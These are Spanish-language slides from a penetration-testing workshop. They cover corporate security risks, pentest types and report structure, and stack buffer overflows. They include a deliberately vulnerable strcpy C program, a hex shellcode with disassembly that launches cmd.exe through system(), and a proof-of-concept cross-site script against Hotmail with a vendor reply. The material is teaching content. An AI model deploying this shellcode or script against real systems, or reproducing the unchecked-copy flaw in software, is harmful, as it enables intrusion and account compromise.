Este documento presenta una agenda y actividades para un taller sobre pruebas de penetración (pentest). La agenda incluye introducciones a pentest, técnicas básicas de hacking y una sesión de preguntas y respuestas. Las actividades cubren riesgos de seguridad corporativa, tipos de pruebas de pentest, estructura de un pentest, técnicas básicas de hacking y conclusiones. El documento también proporciona ejemplos de shellcodes y explica vulnerabilidades como buffer overflows.

1. PEN TEST WorkShop El Arte de la Guerra Vicente Chi Pérez Luis Alberto Cortes

2. PEN TEST AGENDA WORKSHOP 20 Min: Que es un Pentest? 40 Min: Be a Lulzsecguyfor a while!!!! 60 Min: Betterthananonymous!!!. 20 Min: Preguntas y respuestas.

3. PEN TEST ACTIVIDADES WORKSHOP RIESGOS DE LA SEGURIDAD CORPORATIVA PRUEBAS DE PENETRACION TIPOS DE PRUEBAS ESTRUCTURA DE UN PENTEST TECNICAS BASICAS DE HACKEO HACKING !!!!! CONCLUSIONES

5. El mismo numero 98% desconoce la forma de pensar y las técnicas usadas por los atacantes.

6. En la actualidad el hacking ha crecido mas como una actividad delictiva y enfocada a ciertos blancos.

8. Perdida o modificación de datos.

9. Incumplimiento de regulaciones (SOX, CNBV, LFPDPPP, etc.)

10. Robo de identidad o datos sensibles (Datos Identificables, Crediticios, Patrimoniales, etc.)

11. Espionaje industrial.

13. Conocimiento de sistemas operativos.

14. Conocimiento de desarrollo.

15. Conocimiento de ingeniería en reversa.

16. Conocimiento de herramientas.

17. Conocimiento de °!#$#&&/&()&))==?((#234Contraten Hackers! Microsoft, Mcafee, Symantec, USA DoD, NSA, Kaspersky, etc.

19. Con el conocimiento de la infraestructura.

20. Tiene menos riesgos pues se sabe que sistemas atacar y por donde.

21. GREY BOX

22. Conocimiento parcial de la infraestructura.

23. Tienes riesgos bajos ya que abra que hacer intentos de prueba y error.

24. BLACK BOX

25. Sin conocimiento alguno de la infraestructura.

27. Application Vulnerability Assessment.

28. Source Code Security Analysis.

29. Wi-Fi Penetration Testing

30. Social Engineering.

31. Physical Security.

32. Industrial Espionage.

34. Open Web Application Security Project (OWASP)

35. National Institute of Standards and Technology-SP800-115 (NIST)

37. Establecer blancos.

39. Social Engineering.

41. Services & Applications

43. Evidence

45. Evidence Cleaning

47. Technical Details

49. Testing Team Details (Names, Contacts, Expertise)

50. Client Details (Details: network, servers, workstations, AD)

51. Scope of Testing

52. Purpose & Type (Assessment, New Implementation, Compliance, Security Pen Test)

53. Category (White box, Black Box, Grey Box)

54. Executive Summary (Brief)

55. Security Issues (With Critical level)

56. OS

57. Exploited & Unexploited

58. Application & Web

59. Exploited & Unexploited

60. Physical (Facilities)

61. Exploited & Unexploited

62. Personnel (Social Engineering)

63. Exploited & Unexploited

64. General

65. Exploited & Unexploited

66. Technical Summary

67. OS Security, Web Security, Database Security, Application Security, Business Security , Policies and Procedures

70. FormatStrings

71. DoubleFrees

72. NullSessions

73. Spoofing

74. Sniffing

75. Zapping

76. BruteForcing

78. ParameterTampering

79. InformationDisclosure

81. Alternate Data Streams (filesystems)

82. Email HackingFrameRelay IdentityThief

84. Inclusión de Archivos

85. Archivos de Backup (.BAK .INC ETC)

86. Inyección de código PHP

87. Errores de Configuración

88. Mala Técnica de Programación

89. SQL Injection

91. PEN TEST EXPLOITS BUFFER OVERFLOWS WORKSHOP Definición Insertar datos mas grandes que el máximo alocado en memoria, dando esto en el cambio de flujo del programa ya sea por corrupción del Extended Instruction Pointer (EIP) o funciones corruptas (Heap) Porque Existen los BO La forma en que la creación de sistemas operativos se enseña provee una optimización de lectura y escritura en la memoria, por lo cual es espacio se aloca de izquierda a derecha y se escribe en forma inversa. Cada ves que un programa ejecuta una rutina el sistema operativo hace lo siguiente: Guardar la dirección de la siguiente instrucción valida en EIP (4 Bytes, 0x77777777) Guardar la dirección de las variables dentro de un puntero en EBP (4 Bytes, 0x77777777) Alocar espacio para las variables de la función que se esta llamando (Depende del Buffer) Una ves terminada la función, se llama al código que punta EIP (Valor guardado) Y así sucesivamente……. Por lo que si tomamos control de EIP, podemos decir que al terminar la función el programa ejecute como siguiente código lo que el hacker quiera.

92. PEN TEST EXPLOITS BUFFER OVERFLOWS WORKSHOP #include <stdio.h> #include <string.h> intmain(intargc, char **argv) { char buffer[20]; strcpy(buffer, argv[1]); printf("%s", buffer); } PADDING EIP EBP BUFFER 20 BYTES SEH Handler STACK STACK 0xC0000005 0x45DF33AD 0x65D537AB NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.

94. JumpIntotheStack(la mas común utilizada en Linux)

95. Consiste en saltar directamente al payload o shellcode.

96. CallJumpStack(La mas común utilizada en Windows)

97. Consiste en saltar a una dirección estática de memoria que a su ves apunta a la direccion de nuestro payload o shellcodeNTDL.dll Kernel32.dll USER32.dll Call ESP JMP ESP PADDING EIP EBP BUFFER 20 BYTES SEH Handler STACK - ESP STACK - EAX “AAAAAAAAAAAAAAAAAAAAAAAAAA” 0xC0000005 0x41414141 0x41414141 Dirección de la escritura en la memoria. NOTA: Algunos compiladores crean un padding de algunos bytes para evitar el BO.

98. PEN TEST SHELLCODES WORKSHOP System(cmd.exe) “558BEC33FF5783EC08C645F863C645F96DC645FA64C645FB2EC645FC65C645FD78C645FE658D45 F8bb4480BF77FFD3” System(cmd.exe) 0040B4EC |. 55 PUSH EBP # Aquí empieza nuestra shellcode 0040B4ED |. 8BEC MOV EBP,ESP 0040B4EF |. 33FF XOR EDI,EDI 0040B4F1 |. 57 PUSH EDI 0040B4F2 |. 83EC 08 SUB ESP,8 0040B4F5 |. C645 F8 63 MOV BYTE PTR SS:[EBP-8],63 # ”C” 0040B4F9 |. C645 F9 6D MOV BYTE PTR SS:[EBP-7],6D # ”M” 0040B4FD |. C645 FA 64 MOV BYTE PTR SS:[EBP-6],64 # ”D” 0040B501 |. C645 FB 2E MOV BYTE PTR SS:[EBP-5],2E # ”.” 0040B505 |. C645 FC 65 MOV BYTE PTR SS:[EBP-4],65 # ”E” 0040B509 |. C645 FD 78 MOV BYTE PTR SS:[EBP-3],78 # ”X” 0040B50D |. C645 FE 65 MOV BYTE PTR SS:[EBP-2],65 # ”E” 0040B511 |. 8D45 F8 LEA eax,DWORD PTR SS:[EBP-8] #”CMD.EXE” 0040B514 |. 50 PUSH eax 0040B515 |. BB 4480BF77 MOV EBX, 76FDAB6B # Direccion del system() msvcrt.dll VISTA ESPAÑOL 0040B51A |. FFD3 CALL EBX # EJECUTA SYSTEM CON CMD.EXE DE PARAMETRO

99. PEN TEST MAKING YOUR FIRST EXPLOT WORKSHOP “Hacktheplanet”

100. PEN TEST CONCLUSIONES WORKSHOP Be OnetoDefeatOne Si no conoces hackers y no sabes como romper y atacar sistemas, como esperas defenderte de ello? Cualquiera puede ser hacker No es ser un genio, es solo el gusto de aprender. La cultura de la seguridad se esta perdiendo Ya no hay investigación ni desarrollo, se necesita mas gente interesada La mayoría de los avances tecnológicos han sido gracias a los hackers. Los consultores de seguridad están prostituidos, cuantos realmente saben hacer exploits y son buenos técnicamente y cuantos, solo tienen el titulo o la certificación por saber usar herramientas ya hechas. (ósea nada nuevo) Hackers famosos != Hackers buenos SQL Injection = Lulzsec & anonymous

102. Hotmail Cross SiteMessage ExploreProof of Concept Hotmail Cross SiteMessage Explorer byNaPa Security NationLabs – México ----------------------------------------------------------------- <html> <head> </head> <body> <script> str1=document.URL; str2=str1.split("?"); str3=str2[1]; str4=str3.split("&"); str5="http://by17fd.bay17.hotmail.msn.com/cgibin/ getmsg?msg=&start=&len=&mfs=&cmd=next&lastmsgid="; str6=str4[2]; str7=str6.split("="); str8=str7[1]; str9="&msgread=&etype=&wo="; str10=str5+str8+str9+"&"+str4[0]+"&"+str4[1] window.open(str10); </script> hola napa </body> </html> --------------------------------------------------------------------- Thanksforthefastreply Luis, OK no problems I willprovideyouwithanupdatewhentheteamturnsonthe "a" attribute at theend of October. Itssomethingwehavedifficultywithacknowledgingfindersforour online services, as wedon'tissue a securitybulletinforthem. I apologizeforthis, maybe once thisisalloveryou can present at anyconference and discussthisissue and howwewentfrom a badsituationto a greatoutcome and youweretheresearcherthewholewayalongwhoworkedwith Microsoft tosecureits online systems? I don'tknow I am justthinkingaloud... Cheers Scott D.

103. CONTACTO Vicente Chi Pérez vicente@securitynation.com Luis Alberto Cortes napa@securitynation.com MSN: napa_topos@hotmail.com GRA CIAS